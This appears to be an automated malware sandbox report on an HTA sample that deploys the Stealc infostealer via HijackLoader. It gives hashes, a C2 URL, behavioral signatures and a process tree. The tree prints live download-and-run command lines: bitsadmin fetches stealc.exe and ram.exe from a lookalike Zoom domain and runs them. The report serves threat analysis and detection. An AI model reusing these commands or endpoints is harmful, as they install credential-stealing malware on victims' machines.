Analysis
max time kernel: 132s
max time network: 126s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 18-10-2024 02:13
Static task: static1
Behavioral task: behavioral1
  Sample: 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138.hta
  Resource: win7-20240903-en
General
Target: 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138.hta
Size: 74KB
MD5: acfba6ff2e80e0ebc80df9e7d326337c
SHA1: fe28d5756815fdac31a744a2f11c075f5b1892bc
SHA256: 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138
SHA512: 2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00
SSDEEP: 768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj
Malware Config
Extracted: stealc
sneprivate29
http://95.182.97.58
url_path: /84b7b6f977dd1c65.php
Signatures

Detects HijackLoader (aka IDAT Loader) 1 IoCs
resource | yara_rule
behavioral1/memory/2612-21-0x0000000000400000-0x0000000000561000-memory.dmp | family_hijackloader

HijackLoader
HijackLoader is a multistage loader first seen in 2023.
Blocklisted process makes network request 5 IoCs
flow | pid | Process
5 | 2380 | mshta.exe
7 | 2380 | mshta.exe
9 | 2380 | mshta.exe
11 | 2380 | mshta.exe
15 | 2380 | mshta.exe
Download via BitsAdmin 1 TTPs 2 IoCs
pid | Process
2652 | bitsadmin.exe
2660 | bitsadmin.exe

Downloads MZ/PE file
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 2612 set thread context of 2200 | 2612 | stealc.exe | 41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid | pid_target | Process | procid_target
1768 | 2352 | WerFault.exe | 47
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | stealc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | explorer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | explorer.exe
Delays execution with timeout.exe 2 IoCs
pid | Process
2656 | timeout.exe
2636 | timeout.exe
Kills process with taskkill 1 IoCs
pid | Process
744 | taskkill.exe
Modifies Internet Explorer settings 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description | flow | ioc
HTTP User-Agent header | 15 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid | Process
2612 | stealc.exe
2612 | stealc.exe
2200 | cmd.exe
2200 | cmd.exe
2352 | explorer.exe
Suspicious behavior: MapViewOfSection 2 IoCs
pid | Process
2612 | stealc.exe
2200 | cmd.exe
Suspicious use of WriteProcessMemory 46 IoCs
description | pid | Process | procid_target
PID 2380 wrote to memory of 2736 | 2380 | mshta.exe | 33
PID 2380 wrote to memory of 2736 | 2380 | mshta.exe | 33
PID 2380 wrote to memory of 2736 | 2380 | mshta.exe | 33
PID 2380 wrote to memory of 2736 | 2380 | mshta.exe | 33
PID 2380 wrote to memory of 2652 | 2380 | mshta.exe | 35
PID 2380 wrote to memory of 2652 | 2380 | mshta.exe | 35
PID 2380 wrote to memory of 2652 | 2380 | mshta.exe | 35
PID 2380 wrote to memory of 2652 | 2380 | mshta.exe | 35
PID 2736 wrote to memory of 2656 | 2736 | cmd.exe | 37
PID 2736 wrote to memory of 2656 | 2736 | cmd.exe | 37
PID 2736 wrote to memory of 2656 | 2736 | cmd.exe | 37
PID 2736 wrote to memory of 2656 | 2736 | cmd.exe | 37
PID 2380 wrote to memory of 2612 | 2380 | mshta.exe | 38
PID 2380 wrote to memory of 2612 | 2380 | mshta.exe | 38
PID 2380 wrote to memory of 2612 | 2380 | mshta.exe | 38
PID 2380 wrote to memory of 2612 | 2380 | mshta.exe | 38
PID 2380 wrote to memory of 2612 | 2380 | mshta.exe | 38
PID 2380 wrote to memory of 2612 | 2380 | mshta.exe | 38
PID 2380 wrote to memory of 2612 | 2380 | mshta.exe | 38
PID 2380 wrote to memory of 2636 | 2380 | mshta.exe | 39
PID 2380 wrote to memory of 2636 | 2380 | mshta.exe | 39
PID 2380 wrote to memory of 2636 | 2380 | mshta.exe | 39
PID 2380 wrote to memory of 2636 | 2380 | mshta.exe | 39
PID 2612 wrote to memory of 2200 | 2612 | stealc.exe | 41
PID 2612 wrote to memory of 2200 | 2612 | stealc.exe | 41
PID 2612 wrote to memory of 2200 | 2612 | stealc.exe | 41
PID 2612 wrote to memory of 2200 | 2612 | stealc.exe | 41
PID 2380 wrote to memory of 2660 | 2380 | mshta.exe | 43
PID 2380 wrote to memory of 2660 | 2380 | mshta.exe | 43
PID 2380 wrote to memory of 2660 | 2380 | mshta.exe | 43
PID 2380 wrote to memory of 2660 | 2380 | mshta.exe | 43
PID 2736 wrote to memory of 744 | 2736 | cmd.exe | 46
PID 2736 wrote to memory of 744 | 2736 | cmd.exe | 46
PID 2736 wrote to memory of 744 | 2736 | cmd.exe | 46
PID 2736 wrote to memory of 744 | 2736 | cmd.exe | 46
PID 2612 wrote to memory of 2200 | 2612 | stealc.exe | 41
PID 2200 wrote to memory of 2352 | 2200 | cmd.exe | 47
PID 2200 wrote to memory of 2352 | 2200 | cmd.exe | 47
PID 2200 wrote to memory of 2352 | 2200 | cmd.exe | 47
PID 2200 wrote to memory of 2352 | 2200 | cmd.exe | 47
PID 2200 wrote to memory of 2352 | 2200 | cmd.exe | 47
PID 2200 wrote to memory of 2352 | 2200 | cmd.exe | 47
PID 2352 wrote to memory of 1768 | 2352 | explorer.exe | 49
PID 2352 wrote to memory of 1768 | 2352 | explorer.exe | 49
PID 2352 wrote to memory of 1768 | 2352 | explorer.exe | 49
PID 2352 wrote to memory of 1768 | 2352 | explorer.exe | 49
Processes

[depth 1] C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138.hta"
  PID: 2380
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
    PID: 2736
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\SysWOW64\timeout.exe
      Command line: timeout /t 30 /nobreak
      PID: 2656
      - System Location Discovery: System Language Discovery
      - Delays execution with timeout.exe

    [depth 3] C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /F /PID
      PID: 744
      - System Location Discovery: System Language Discovery
      - Kills process with taskkill

  [depth 2] C:\Windows\SysWOW64\bitsadmin.exe
    Command line: "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
    PID: 2652
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery

  [depth 2] C:\Users\Admin\AppData\Local\Temp\stealc.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\stealc.exe"
    PID: 2612
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\SysWOW64\cmd.exe
      PID: 2200
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\SysWOW64\explorer.exe
        Command line: C:\Windows\SysWOW64\explorer.exe
        PID: 2352
        - System Location Discovery: System Language Discovery
        - Checks processor information in registry
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 804
          PID: 1768
          - Program crash

  [depth 2] C:\Windows\SysWOW64\timeout.exe
    Command line: "C:\Windows\System32\timeout.exe" /T 2 /nobreak
    PID: 2636
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe

  [depth 2] C:\Windows\SysWOW64\bitsadmin.exe
    Command line: "C:\Windows\System32\bitsadmin.exe" /transfer secondDownloadJob /download /priority foreground https://us18web-zoom.us/ram.exe C:\Users\Admin\AppData\Local\Temp\ram.exe
    PID: 2660
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery

  [depth 2] C:\Users\Admin\AppData\Local\Temp\ram.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\ram.exe"
    PID: 2868
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\favicon[1].ico
Filesize: 5KB
MD5: f3418a443e7d841097c714d69ec4bcb8
SHA1: 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256: 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512: 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

Filesize: 1.0MB
MD5: b7a38e03aefd3366bfade44bcac85ba6
SHA1: c043abead4da49e00674d8815e0f85ed6b3c79c3
SHA256: e0d8a1bcf0a809c29583cbaedb5cf8e5ccb8addbacf78d367d79f7437ae7f091
SHA512: c16eb9f02242d6ebea451159c8d7fe2cda1fc395d35f1c3c3550fa435b8546400b60908113f0552982ecb42ddf0c7f9d2402b82b0ad2f64bfa615d81375f5504